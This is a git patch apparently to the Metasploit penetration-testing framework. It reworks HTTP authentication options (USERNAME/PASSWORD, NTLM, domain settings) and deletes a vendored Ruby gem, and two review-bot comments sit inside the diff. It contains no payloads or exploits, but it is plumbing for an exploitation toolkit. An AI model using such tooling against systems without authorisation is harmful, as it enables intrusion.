From: David Maloney Date: Tue, 19 Feb 2013 21:25:37 -0600 Subject: [PATCH 20/87] trying to clean up the mess from the revert --- lib/anemone/rex_http.rb | 4 +- .../1.9.1/gems/method_source-0.7.1/.gemtest | 0 .../gems/method_source-0.7.1/.travis.yml | 17 -- .../1.9.1/gems/method_source-0.7.1/.yardopts | 1 - .../1.9.1/gems/method_source-0.7.1/Gemfile | 2 - .../1.9.1/gems/method_source-0.7.1/LICENSE | 25 -- .../gems/method_source-0.7.1/README.markdown | 91 ------ .../1.9.1/gems/method_source-0.7.1/Rakefile | 76 ----- .../method_source-0.7.1/lib/method_source.rb | 163 ----------- .../lib/method_source/source_location.rb | 138 --------- .../lib/method_source/version.rb | 3 - .../method_source-0.7.1/method_source.gemspec | 33 --- .../gems/method_source-0.7.1/test/test.rb | 122 -------- .../method_source-0.7.1/test/test_helper.rb | 50 ---- lib/msf/core/auxiliary/crawler.rb | 14 +- lib/msf/core/auxiliary/web/http.rb | 13 +- lib/msf/core/exploit/http/client.rb | 265 ++---------------- lib/rex/proto/http/client.rb | 28 +- 18 files changed, 65 insertions(+), 980 deletions(-) delete mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.gemtest delete mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.travis.yml delete mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.yardopts delete mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Gemfile delete mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/LICENSE delete mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/README.markdown delete mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Rakefile delete mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source.rb delete mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/source_location.rb delete mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/version.rb delete mode 100644 
lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/method_source.gemspec delete mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test.rb delete mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test_helper.rb diff --git a/lib/anemone/rex_http.rb b/lib/anemone/rex_http.rb index ce6a71a17f..f606f289fc 100644 --- a/lib/anemone/rex_http.rb +++ b/lib/anemone/rex_http.rb @@ -188,7 +188,9 @@ module Anemone context, url.scheme == "https", 'SSLv23', - @opts[:proxies] + @opts[:proxies], + @opts[:username], + @opts[:password] ) conn.set_config( diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.gemtest b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.gemtest deleted file mode 100644 index e69de29bb2..0000000000 diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.travis.yml b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.travis.yml deleted file mode 100644 index ba51bba6b2..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.travis.yml +++ /dev/null @@ -1,17 +0,0 @@ -rvm: - - 1.8.7 - - 1.9.2 - - 1.9.3 - - ree - - rbx-18mode - - rbx-19mode - - jruby - -notifications: - irc: "irc.freenode.org#pry" - recipients: - - jrmair@gmail.com - -branches: - only: - - master diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.yardopts b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.yardopts deleted file mode 100644 index a4e7838016..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.yardopts +++ /dev/null @@ -1 +0,0 @@ --m markdown diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Gemfile b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Gemfile deleted file mode 100644 index e45e65f871..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Gemfile +++ /dev/null @@ -1,2 +0,0 @@ -source :rubygems -gemspec 
diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/LICENSE b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/LICENSE deleted file mode 100644 index d1a50d62d0..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/LICENSE +++ /dev/null @@ -1,25 +0,0 @@ -License -------- - -(The MIT License) - -Copyright (c) 2011 John Mair (banisterfiend) - -Permission is hereby granted, free of charge, to any person obtaining -a copy of this software and associated documentation files (the -'Software'), to deal in the Software without restriction, including -without limitation the rights to use, copy, modify, merge, publish, -distribute, sublicense, and/or sell copies of the Software, and to -permit persons to whom the Software is furnished to do so, subject to -the following conditions: - -The above copyright notice and this permission notice shall be -included in all copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND, -EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF -MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. -IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY -CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, -TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE -SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/README.markdown b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/README.markdown deleted file mode 100644 index d91b810a3b..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/README.markdown +++ /dev/null 
@@ -1,91 +0,0 @@ -method_source -============= - -(C) John Mair (banisterfiend) 2011 - -_retrieve the sourcecode for a method_ - -*NOTE:* This simply utilizes `Method#source_location`; it - does not access the live AST. - -`method_source` is a utility to return a method's sourcecode as a -Ruby string. Also returns `Proc` and `Lambda` sourcecode. - -Method comments can also be extracted using the `comment` method. - -It is written in pure Ruby (no C). - -* Some Ruby 1.8 support now available. -* Support for MRI, RBX, JRuby, REE - -`method_source` provides the `source` and `comment` methods to the `Method` and -`UnboundMethod` and `Proc` classes. - -* Install the [gem](https://rubygems.org/gems/method_source): `gem install method_source` -* Read the [documentation](http://rdoc.info/github/banister/method_source/master/file/README.markdown) -* See the [source code](http://github.com/banister/method_source) - -Example: display method source ------------------------------- - - Set.instance_method(:merge).source.display - # => - def merge(enum) - if enum.instance_of?(self.class) - @hash.update(enum.instance_variable_get(:@hash)) - else - do_with_enum(enum) { |o| add(o) } - end - - self - end - -Example: display method comments --------------------------------- - - Set.instance_method(:merge).comment.display - # => - # Merges the elements of the given enumerable object to the set and - # returns self. - -Limitations: ------------- - -* Occasional strange behaviour in Ruby 1.8 -* Cannot return source for C methods. -* Cannot return source for dynamically defined methods. - -Special Thanks --------------- - -[Adam Sanderson](https://github.com/adamsanderson) for `comment` functionality. - -[Dmitry Elastic](https://github.com/dmitryelastic) for the brilliant Ruby 1.8 `source_location` hack. - -[Samuel Kadolph](https://github.com/samuelkadolph) for the JRuby 1.8 `source_location`. 
- -License -------- - -(The MIT License) - -Copyright (c) 2011 John Mair (banisterfiend) - -Permission is hereby granted, free of charge, to any person obtaining -a copy of this software and associated documentation files (the -'Software'), to deal in the Software without restriction, including -without limitation the rights to use, copy, modify, merge, publish, -distribute, sublicense, and/or sell copies of the Software, and to -permit persons to whom the Software is furnished to do so, subject to -the following conditions: - -The above copyright notice and this permission notice shall be -included in all copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND, -EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF -MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. -IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY -CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, -TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE -SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Rakefile b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Rakefile deleted file mode 100644 index 92c0234f3b..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Rakefile +++ /dev/null 
@@ -1,76 +0,0 @@ -dlext = Config::CONFIG['DLEXT'] -direc = File.dirname(__FILE__) - -require 'rake/clean' -require 'rake/gempackagetask' -require "#{direc}/lib/method_source/version" - -CLOBBER.include("**/*.#{dlext}", "**/*~", "**/*#*", "**/*.log", "**/*.o") -CLEAN.include("ext/**/*.#{dlext}", "ext/**/*.log", "ext/**/*.o", - "ext/**/*~", "ext/**/*#*", "ext/**/*.obj", "**/*.rbc", - "ext/**/*.def", "ext/**/*.pdb", "**/*_flymake*.*", "**/*_flymake") - -def apply_spec_defaults(s) - s.name = "method_source" - s.summary = "retrieve the sourcecode for a method" - s.version = MethodSource::VERSION - s.date = Time.now.strftime '%Y-%m-%d' - s.author = "John Mair (banisterfiend)" - s.email = 'jrmair@gmail.com' - s.description = s.summary - s.require_path = 'lib' - - s.add_development_dependency("bacon","~>1.1.0") - s.add_development_dependency("rake", "~>0.9") - s.homepage = "http://banisterfiend.wordpress.com" - s.has_rdoc = 'yard' - s.files = `git ls-files`.split("\n") - s.test_files = `git ls-files -- test/*`.split("\n") -end - -task :test do - sh "bacon -q #{direc}/test/test.rb" -end - -desc "reinstall gem" -task :reinstall => :gems do - sh "gem uninstall method_source" rescue nil - sh "gem install #{direc}/pkg/method_source-#{MethodSource::VERSION}.gem" -end - -desc "Set up and run tests" -task :default => [:test] - -namespace :ruby do - spec = Gem::Specification.new do |s| - apply_spec_defaults(s) - s.platform = Gem::Platform::RUBY - end - - Rake::GemPackageTask.new(spec) do |pkg| - pkg.need_zip = false - pkg.need_tar = false - end - - desc "Generate gemspec file" - task :gemspec do - File.open("#{spec.name}.gemspec", "w") do |f| - f << spec.to_ruby - end - end -end - -desc "build all platform gems at once" -task :gems => [:rmgems, "ruby:gem"] - -desc "remove all platform gems" -task :rmgems => ["ruby:clobber_package"] - -desc "build and push latest gems" -task :pushgems => :gems do - chdir("#{direc}/pkg") do - Dir["*.gem"].each do |gemfile| - sh "gem push #{gemfile}" 
- end - end -end diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source.rb b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source.rb deleted file mode 100644 index 9a3c325f75..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source.rb +++ /dev/null 
@@ -1,163 +0,0 @@ -# (C) John Mair (banisterfiend) 2011 -# MIT License - -direc = File.dirname(__FILE__) - -require "#{direc}/method_source/version" -require "#{direc}/method_source/source_location" - -module MethodSource - # Determine if a string of code is a valid Ruby expression. - # @param [String] code The code to validate. - # @return [Boolean] Whether or not the code is a valid Ruby expression. - # @example - # valid_expression?("class Hello") #=> false - # valid_expression?("class Hello; end") #=> true - def self.valid_expression?(str) - if defined?(Rubinius::Melbourne19) && RUBY_VERSION =~ /^1\.9/ - Rubinius::Melbourne19.parse_string(str) - elsif defined?(Rubinius::Melbourne) - Rubinius::Melbourne.parse_string(str) - else - catch(:valid) { - eval("BEGIN{throw :valid}\n#{str}") - } - end - true - rescue SyntaxError - false - end - - # Helper method responsible for extracting method body. - # Defined here to avoid polluting `Method` class. - # @param [Array] source_location The array returned by Method#source_location - # @return [File] The opened source file - def self.source_helper(source_location) - return nil if !source_location.is_a?(Array) - - file_name, line = source_location - File.open(file_name) do |file| - (line - 1).times { file.readline } - - code = "" - loop do - val = file.readline - code << val - - return code if valid_expression?(code) - end - end - end - - # Helper method responsible for opening source file and buffering up - # the comments for a specified method. Defined here to avoid polluting - # `Method` class. - # @param [Array] source_location The array returned by Method#source_location - # @return [String] The comments up to the point of the method. 
- def self.comment_helper(source_location) - return nil if !source_location.is_a?(Array) - - file_name, line = source_location - File.open(file_name) do |file| - buffer = "" - (line - 1).times do - line = file.readline - # Add any line that is a valid ruby comment, - # but clear as soon as we hit a non comment line. - if (line =~ /^\s*#/) || (line =~ /^\s*$/) - buffer << line.lstrip - else - buffer.replace("") - end - end - - buffer - end - end - - # This module is to be included by `Method` and `UnboundMethod` and - # provides the `#source` functionality - module MethodExtensions - - # We use the included hook to patch Method#source on rubinius. - # We need to use the included hook as Rubinius defines a `source` - # on Method so including a module will have no effect (as it's - # higher up the MRO). - # @param [Class] klass The class that includes the module. - def self.included(klass) - if klass.method_defined?(:source) && Object.const_defined?(:RUBY_ENGINE) && - RUBY_ENGINE =~ /rbx/ - - klass.class_eval do - orig_source = instance_method(:source) - - define_method(:source) do - begin - super - rescue - orig_source.bind(self).call - end - end - - end - end - end - - # Return the sourcecode for the method as a string - # (This functionality is only supported in Ruby 1.9 and above) - # @return [String] The method sourcecode as a string - # @example - # Set.instance_method(:clear).source.display - # => - # def clear - # @hash.clear - # self - # end - def source - if respond_to?(:source_location) - source = MethodSource.source_helper(source_location) - - raise "Cannot locate source for this method: #{name}" if !source - else - raise "#{self.class}#source not supported by this Ruby version (#{RUBY_VERSION})" - end - - source - end - - # Return the comments associated with the method as a string. 
- # (This functionality is only supported in Ruby 1.9 and above) - # @return [String] The method's comments as a string - # @example - # Set.instance_method(:clear).comment.display - # => - # # Removes all elements and returns self. - def comment - if respond_to?(:source_location) - comment = MethodSource.comment_helper(source_location) - - raise "Cannot locate source for this method: #{name}" if !comment - else - raise "#{self.class}#comment not supported by this Ruby version (#{RUBY_VERSION})" - end - - comment - end - end -end - -class Method - include MethodSource::SourceLocation::MethodExtensions - include MethodSource::MethodExtensions -end - -class UnboundMethod - include MethodSource::SourceLocation::UnboundMethodExtensions - include MethodSource::MethodExtensions -end - -class Proc - include MethodSource::SourceLocation::ProcExtensions - include MethodSource::MethodExtensions -end - diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/source_location.rb b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/source_location.rb deleted file mode 100644 index 9161854819..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/source_location.rb +++ /dev/null 
@@ -1,138 +0,0 @@ -module MethodSource - module ReeSourceLocation - # Ruby enterprise edition provides all the information that's - # needed, in a slightly different way. - def source_location - [__file__, __line__] rescue nil - end - end - - module SourceLocation - module MethodExtensions - if Proc.method_defined? :__file__ - include ReeSourceLocation - - elsif defined?(RUBY_ENGINE) && RUBY_ENGINE =~ /jruby/ - require 'java' - - # JRuby version source_location hack - # @return [Array] A two element array containing the source location of the method - def source_location - to_java.source_location(Thread.current.to_java.getContext()) - end - else - - - def trace_func(event, file, line, id, binding, classname) - return unless event == 'call' - set_trace_func nil - - @file, @line = file, line - raise :found - end - - private :trace_func - - # Return the source location of a method for Ruby 1.8. - # @return [Array] A two element array. First element is the - # file, second element is the line in the file where the - # method definition is found. - def source_location - if @file.nil? - args =[*(1..(arity<-1 ? -arity-1 : arity ))] - - set_trace_func method(:trace_func).to_proc - call(*args) rescue nil - set_trace_func nil - @file = File.expand_path(@file) if @file && File.exist?(File.expand_path(@file)) - end - return [@file, @line] if File.exist?(@file.to_s) - end - end - end - - module ProcExtensions - if Proc.method_defined? :__file__ - include ReeSourceLocation - - elsif defined?(RUBY_ENGINE) && RUBY_ENGINE =~ /rbx/ - - # Return the source location for a Proc (Rubinius only) - # @return [Array] A two element array. First element is the - # file, second element is the line in the file where the - # proc definition is found. - def source_location - [block.file.to_s, block.line] - end - else - - # Return the source location for a Proc (in implementations - # without Proc#source_location) - # @return [Array] A two element array. 
First element is the - # file, second element is the line in the file where the - # proc definition is found. - def source_location - self.to_s =~ /@(.*):(\d+)/ - [$1, $2.to_i] - end - end - end - - module UnboundMethodExtensions - if Proc.method_defined? :__file__ - include ReeSourceLocation - - elsif defined?(RUBY_ENGINE) && RUBY_ENGINE =~ /jruby/ - require 'java' - - # JRuby version source_location hack - # @return [Array] A two element array containing the source location of the method - def source_location - to_java.source_location(Thread.current.to_java.getContext()) - end - - else - - - # Return the source location of an instance method for Ruby 1.8. - # @return [Array] A two element array. First element is the - # file, second element is the line in the file where the - # method definition is found. - def source_location - klass = case owner - when Class - owner - when Module - method_owner = owner - Class.new { include(method_owner) } - end - - # deal with immediate values - case - when klass == Symbol - return :a.method(name).source_location - when klass == Fixnum - return 0.method(name).source_location - when klass == TrueClass - return true.method(name).source_location - when klass == FalseClass - return false.method(name).source_location - when klass == NilClass - return nil.method(name).source_location - end - - begin - Object.instance_method(:method).bind(klass.allocate).call(name).source_location - rescue TypeError - - # Assume we are dealing with a Singleton Class: - # 1. Get the instance object - # 2. Forward the source_location lookup to the instance - instance ||= ObjectSpace.each_object(owner).first - Object.instance_method(:method).bind(instance).call(name).source_location - end - end - end - end - end -end diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/version.rb b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/version.rb deleted file mode 100644 index b8142bfaef..0000000000 
--- a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/version.rb +++ /dev/null @@ -1,3 +0,0 @@ -module MethodSource - VERSION = "0.7.1" -end diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/method_source.gemspec b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/method_source.gemspec deleted file mode 100644 index 83a727d6f6..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/method_source.gemspec +++ /dev/null @@ -1,33 +0,0 @@ -# -*- encoding: utf-8 -*- - -Gem::Specification.new do |s| - s.name = "method_source" - s.version = "0.7.0" - - s.required_rubygems_version = Gem::Requirement.new(">= 0") if s.respond_to? :required_rubygems_version= - s.authors = ["John Mair (banisterfiend)"] - s.date = "2012-01-01" - s.description = "retrieve the sourcecode for a method" - s.email = "jrmair@gmail.com" - s.files = [".gemtest", ".travis.yml", ".yardopts", "Gemfile", "LICENSE", "README.markdown", "Rakefile", "lib/method_source.rb", "lib/method_source/source_location.rb", "lib/method_source/version.rb", "method_source.gemspec", "test/test.rb", "test/test_helper.rb"] - s.homepage = "http://banisterfiend.wordpress.com" - s.require_paths = ["lib"] - s.rubygems_version = "1.8.10" - s.summary = "retrieve the sourcecode for a method" - s.test_files = ["test/test.rb", "test/test_helper.rb"] - - if s.respond_to? :specification_version then - s.specification_version = 3 - - if Gem::Version.new(Gem::VERSION) >= Gem::Version.new('1.2.0') then - s.add_development_dependency(%q, ["~> 1.1.0"]) - s.add_development_dependency(%q, ["~> 0.9"]) - else - s.add_dependency(%q, ["~> 1.1.0"]) - s.add_dependency(%q, ["~> 0.9"]) - end - else - s.add_dependency(%q, ["~> 1.1.0"]) - s.add_dependency(%q, ["~> 0.9"]) - end -end diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test.rb b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test.rb deleted file mode 100644 index 425e56acf9..0000000000 
--- a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test.rb +++ /dev/null 
@@ -1,122 +0,0 @@ -direc = File.dirname(__FILE__) - -require 'rubygems' -require 'bacon' -require "#{direc}/../lib/method_source" -require "#{direc}/test_helper" - -describe MethodSource do - - describe "source_location (testing 1.8 implementation)" do - it 'should return correct source_location for a method' do - method(:hello).source_location.first.should =~ /test_helper/ - end - - it 'should not raise for immediate instance methods' do - [Symbol, Fixnum, TrueClass, FalseClass, NilClass].each do |immediate_class| - lambda { immediate_class.instance_method(:to_s).source_location }.should.not.raise - end - end - - it 'should not raise for immediate methods' do - [:a, 1, true, false, nil].each do |immediate| - lambda { immediate.method(:to_s).source_location }.should.not.raise - end - end - end - - before do - @hello_module_source = " def hello; :hello_module; end\n" - @hello_singleton_source = "def $o.hello; :hello_singleton; end\n" - @hello_source = "def hello; :hello; end\n" - @hello_comment = "# A comment for hello\n# It spans two lines and is indented by 2 spaces\n" - @lambda_comment = "# This is a comment for MyLambda\n" - @lambda_source = "MyLambda = lambda { :lambda }\n" - @proc_source = "MyProc = Proc.new { :proc }\n" - end - - it 'should define methods on Method and UnboundMethod and Proc' do - Method.method_defined?(:source).should == true - UnboundMethod.method_defined?(:source).should == true - Proc.method_defined?(:source).should == true - end - - describe "Methods" do - it 'should return source for method' do - method(:hello).source.should == @hello_source - end - - it 'should return source for a method defined in a module' do - M.instance_method(:hello).source.should == @hello_module_source - end - - it 'should return source for a singleton method as an instance method' do - class << $o; self; end.instance_method(:hello).source.should == @hello_singleton_source - end - - it 'should return source for a singleton method' do - 
$o.method(:hello).source.should == @hello_singleton_source - end - - - it 'should return a comment for method' do - method(:hello).comment.should == @hello_comment - end - - - if !is_rbx? - it 'should raise for C methods' do - lambda { method(:puts).source }.should.raise RuntimeError - end - end - end - - # if RUBY_VERSION =~ /1.9/ || is_rbx? - describe "Lambdas and Procs" do - it 'should return source for proc' do - MyProc.source.should == @proc_source - end - - it 'should return an empty string if there is no comment' do - MyProc.comment.should == '' - end - - it 'should return source for lambda' do - MyLambda.source.should == @lambda_source - end - - it 'should return comment for lambda' do - MyLambda.comment.should == @lambda_comment - end - end - # end - describe "Comment tests" do - before do - @comment1 = "# a\n# b\n" - @comment2 = "# a\n# b\n" - @comment3 = "# a\n#\n# b\n" - @comment4 = "# a\n# b\n" - @comment5 = "# a\n# b\n# c\n# d\n" - end - - it "should correctly extract multi-line comments" do - method(:comment_test1).comment.should == @comment1 - end - - it "should correctly strip leading whitespace before comments" do - method(:comment_test2).comment.should == @comment2 - end - - it "should keep empty comment lines" do - method(:comment_test3).comment.should == @comment3 - end - - it "should ignore blank lines between comments" do - method(:comment_test4).comment.should == @comment4 - end - - it "should align all comments to same indent level" do - method(:comment_test5).comment.should == @comment5 - end - end -end diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test_helper.rb b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test_helper.rb deleted file mode 100644 index 53da4e519c..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test_helper.rb +++ /dev/null 
@@ -1,50 +0,0 @@ -def is_rbx? - defined?(RUBY_ENGINE) && RUBY_ENGINE =~ /rbx/ -end - -def jruby? - defined?(RUBY_ENGINE) && RUBY_ENGINE =~ /jruby/ -end - - -module M - def hello; :hello_module; end -end - -$o = Object.new -def $o.hello; :hello_singleton; end - -# A comment for hello - - # It spans two lines and is indented by 2 spaces -def hello; :hello; end - -# a -# b -def comment_test1; end - - # a - # b -def comment_test2; end - -# a -# -# b -def comment_test3; end - -# a - -# b -def comment_test4; end - - -# a - # b - # c -# d -def comment_test5; end - -# This is a comment for MyLambda -MyLambda = lambda { :lambda } -MyProc = Proc.new { :proc } - diff --git a/lib/msf/core/auxiliary/crawler.rb b/lib/msf/core/auxiliary/crawler.rb index 36e963ecbc..168a130d5b 100644 --- a/lib/msf/core/auxiliary/crawler.rb +++ b/lib/msf/core/auxiliary/crawler.rb @@ -22,7 +22,9 @@ module Auxiliary::HttpCrawler Opt::Proxies, OptInt.new('MAX_PAGES', [ true, 'The maximum number of pages to crawl per URL', 500]), OptInt.new('MAX_MINUTES', [ true, 'The maximum number of minutes to spend on each URL', 5]), - OptInt.new('MAX_THREADS', [ true, 'The maximum number of concurrent requests', 4]) + OptInt.new('MAX_THREADS', [ true, 'The maximum number of concurrent requests', 4]), + OptString.new('USERNAME', [false, 'The HTTP username to specify for authentication']), + OptString.new('PASSWORD', [false, 'The HTTP password to specify for authentication']) ], self.class ) @@ -118,8 +120,9 @@ module Auxiliary::HttpCrawler :info => "" }) - if datastore['BasicAuthUser'] - t[:http_basic_auth] = [ "#{datastore['BasicAuthUser']}:#{datastore['BasicAuthPass']}" ].pack("m*").gsub(/\s+/, '') + if datastore['USERNAME'] and datastore['USERNAME'] != '' + t[:username] = datastore['USERNAME'].to_s + t[:password] = datastore['PASSWORD'].to_s end if datastore['HTTPCookie'] 
@@ -278,9 +281,8 @@ module Auxiliary::HttpCrawler opts[:cookies] = t[:cookies] end - if t[:http_basic_auth] - opts[:http_basic_auth] = t[:http_basic_auth] - end + opts[:username] = t[:username] || '' + opts[:password] =t[:password] || '' opts end diff --git a/lib/msf/core/auxiliary/web/http.rb b/lib/msf/core/auxiliary/web/http.rb index a7c8fc86e3..2ad3dbcb19 100644 --- a/lib/msf/core/auxiliary/web/http.rb +++ b/lib/msf/core/auxiliary/web/http.rb @@ -69,6 +69,7 @@ class Auxiliary::Web::HTTP attr_reader :framework attr_accessor :redirect_limit + attr_accessor :username , :password def initialize( opts = {} ) @opts = opts.dup @@ -84,8 +85,8 @@ class Auxiliary::Web::HTTP @request_opts = {} if opts[:auth].is_a? Hash - @request_opts['basic_auth'] = [ opts[:auth][:user].to_s + ':' + - opts[:auth][:password] ]. pack( 'm*' ).gsub( /\s+/, '' ) + @username = opts[:auth][:user].to_s + @password = opts[:auth][:password].to_s end self.redirect_limit = opts[:redirect_limit] || 20 @@ -105,7 +106,9 @@ class Auxiliary::Web::HTTP opts[:target].port, {}, opts[:target].ssl, - 'SSLv23' + 'SSLv23', + username, + password ) c.set_config({ @@ -296,6 +299,10 @@ class Auxiliary::Web::HTTP opts['data'] = body if body c = connect + if opts['username'] and opts['username'] != '' + c.username = opts['username'].to_s + c.password = opts['password'].to_s + end Response.from_rex_response c.send_recv( c.request_cgi( opts ), timeout ) rescue ::Timeout::Error Response.timed_out diff --git a/lib/msf/core/exploit/http/client.rb b/lib/msf/core/exploit/http/client.rb index 6d0bd9336b..5d8a48891e 100644 --- a/lib/msf/core/exploit/http/client.rb +++ b/lib/msf/core/exploit/http/client.rb 
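Review bot: `opts[:password] =t[:password] || ''` is missing the space after `=`; write `opts[:password] = t[:password] || ''` so it matches the line above. These two lines also set both keys to an empty string for every target, where the removed code set the auth key only when credentials existed. A short comment such as `# empty string means "no credentials configured"` would make that explicit, assuming the HTTP client treats it that way. The method begins outside the hunk.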
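Review bot: In the `connect` hunk of lib/msf/core/auxiliary/web/http.rb, `username` and `password` are passed directly after `'SSLv23'`, but the other two call sites changed in this patch (lib/anemone/rex_http.rb and Exploit::Remote::HttpClient#connect) pass a proxies argument in that position before the credentials. If the client constructor takes proxies as its next positional parameter, as those calls suggest, the username is read as the proxy setting and the password as the username, so authentication silently uses the wrong values. Passing an explicit placeholder keeps the arguments aligned: `'SSLv23', nil, username, password`. The constructor signature is not visible in this patch section, so confirm against it.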
@@ -46,10 +46,8 @@ module Exploit::Remote::HttpClient OptString.new('UserAgent', [false, 'The User-Agent header to use for all requests', Rex::Proto::Http::Client::DefaultUserAgent ]), - OptString.new('BasicAuthUser', [false, 'The HTTP username to specify for basic authentication']), - OptString.new('BasicAuthPass', [false, 'The HTTP password to specify for basic authentication']), - OptString.new('DigestAuthUser', [false, 'The HTTP username to specify for digest authentication']), - OptString.new('DigestAuthPassword', [false, 'The HTTP password to specify for digest authentication']), + OptString.new('USERNAME', [false, 'The HTTP username to specify for authentication', '']), + OptString.new('PASSWORD', [false, 'The HTTP password to specify for authentication', '']), OptBool.new('DigestAuthIIS', [false, 'Conform to IIS, should work for most servers. Only set to false for non-IIS servers', true]), OptBool.new('SSL', [ false, 'Negotiate SSL for outgoing connections', false]), OptEnum.new('SSLVersion', [ false, 'Specify the version of SSL that should be used', 'SSL3', ['SSL2', 'SSL3', 'TLS1']]), @@ -156,7 +154,9 @@ module Exploit::Remote::HttpClient }, dossl, ssl_version, - proxies + proxies, + datastore['USERNAME'], + datastore['PASSWORD'] ) # Configure the HTTP client with the supplied parameter 
@@ -184,7 +184,15 @@ module Exploit::Remote::HttpClient 'pad_post_params_count' => datastore['HTTP::pad_post_params_count'], 'uri_fake_end' => datastore['HTTP::uri_fake_end'], 'uri_fake_params_start' => datastore['HTTP::uri_fake_params_start'], - 'header_folding' => datastore['HTTP::header_folding'] + 'header_folding' => datastore['HTTP::header_folding'], + 'usentlm2_session' => datastore['NTLM::UseNTLM2_session'], + 'use_ntlmv2' => datastore['NTLM::UseNTLMv2'], + 'send_lm' => datastore['NTLM::SendLM'], + 'send_ntlm' => datastore['NTLM::SendNTLM'], + 'SendSPN' => datastore['NTLM::SendSPN'], + 'UseLMKey' => datastore['NTLM::UseLMKey'], + 'domain' => datastore['DOMAIN'], + 'DigestAuthIIS' => datastore['DigestAuthIIS'] ) # If this connection is global, persist it @@ -251,6 +259,10 @@ module Exploit::Remote::HttpClient def send_request_raw(opts={}, timeout = 20) begin c = connect(opts) + if opts['username'] and opts['username'] != '' + c.username = opts['username'].to_s + c.password = opts['password'].to_s + end r = c.request_raw(opts) c.send_recv(r, opts[:timeout] ? opts[:timeout] : timeout) rescue ::Errno::EPIPE, ::Timeout::Error @@ -266,6 +278,10 @@ module Exploit::Remote::HttpClient def send_request_cgi(opts={}, timeout = 20) begin c = connect(opts) + if opts['username'] and opts['username'] != '' + c.username = opts['username'].to_s + c.password = opts['password'].to_s + end r = c.request_cgi(opts) c.send_recv(r, opts[:timeout] ? opts[:timeout] : timeout) rescue ::Errno::EPIPE, ::Timeout::Error 
